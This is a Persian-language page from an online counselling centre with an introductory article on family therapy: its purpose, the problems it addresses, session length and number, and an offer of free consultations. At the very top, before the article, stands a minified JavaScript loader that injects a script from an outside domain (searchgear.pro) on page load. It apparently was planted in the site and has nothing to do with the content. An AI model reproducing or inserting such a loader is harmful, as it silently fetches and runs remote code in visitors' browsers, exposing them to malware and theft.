;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); خانواده درمانی | مرکز مشاوره آنلاین روان‌یاری

خانواده درمانی

میزان پیشرفت خواندن شما

فهرست مطالب

زندگی ما با خانواده شروع می شود ،این خانواده یا هم خون یا یک خانواده پرورشگاهی می باشند. خانواده روی بهتر یا بدتر شدن شخصیت که داریم تاثیر می گذارد ، ما واژگان ،آداب ورسوم و آیین خود را از خانواده یاد میگیریم .

اگر در یک خانواده سالم بزرگ شده باشیم تعامل رفتار با دیگران برای ما راحت می شود اما اگر ، در یک خانواده  نا سالم  بزرگ شده باشیم که برای برقراری ارتباط تلاش می کنند، ما هم ممکن است برای برقراری ارتباط با دیگران تلاش کنیم ، ولی اینکه اگر ما دریک خانواده ناسالم بزرگ شویم ، نمی توانیم وضعیت را تغییر دهیم یک باور غلط است . برای هر خانواده ای ممکن است پیش بیاید که در یک برهه زمانی با نوعی اختلال روبرو شوند، اما بیشتر خانواده ها خوشبختی را حفظ کرده ویا دوباره بدست می آورند.

خانواده درمانی چیست؟

خانواده درمانی نوعی مشاوره روانشناختی است که می تواند اعضای خانواده در بهبود روابط و رفع تعارض ها کمک کند ، که معمولا توسط یک روانشناس یا مددکار بالینی انجام می شود. این دوره درمانی کوتاه است و شامل کل اعضای خانواده  ویا  فقط برخی از افراد خانواده می شود ، برنامه درمانی خاص شما به وضعیت خانواده شما بستگی دارد.

خانواده درمانی چه کمکی به شما می کند؟

 خانواده درمانی می تواند به شما در بهبود روابط  آشفته با شریک زندگی ، فرزند یا سایر اعضای خانواده کمک کند.در خانواده شما ممکن است مشکلاتی مانند مشکلات زناشویی ، مالی ، درگیری بین والدین و فرزندان  یا تاثیر مصرف مواد یا یک بیماری روانی و… داشته باشید.خانواده شما ممکن است علاوه بر خانواده درمانی انواع درمان های  روانی دنبال کند .

خانواده درمانی می تواند در هر موقعیت خانوادگی که باعث ، استرس  ،عصبانیت یا درگیری می شود مفید باشد ،این باعث می شود شما و اعضای خانواده بهتر همدیگر را درک کنید ومهارت های کنار آمدن را یاد بگیرید.

آنچه انتظار دارید

روانشناس معمولا چندین عضو از خانواده را به جلسه درمانی جمع می کند ، ممکن است یک عضو از خانواده به صورت جدا به درمانگر مراجعه کند ، جلسات معمولا ۵۰ دقیقه طول می کشد و اغلب این تعداد جلسات کوتاه و معمولا ۱۲ جلسه است.

نتیجه

خانواده درمانی به صورت ناخودآگاه باعث نمی شود که تعارضات خانوادگی برطرف شود یا وضعیت ناخوشایند خانوادتان از بین رود ، بلکه درمانگر کمک می کند که مهارت هایی برای مقابله با چالش های زندگی یادبگیرید.

اگر به روانشناس درخصوص خانواده درمانی مراجعه کردید  ، دوست داریم در قسمت نظرات ، تجربیات شما را بشنویم که آیا شرکت در جلسات خانواده درمانی مفید است؟
تیم روانیاری در کنار شماست .با ما در تماس باشید.
Rate this post
  طلاق

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.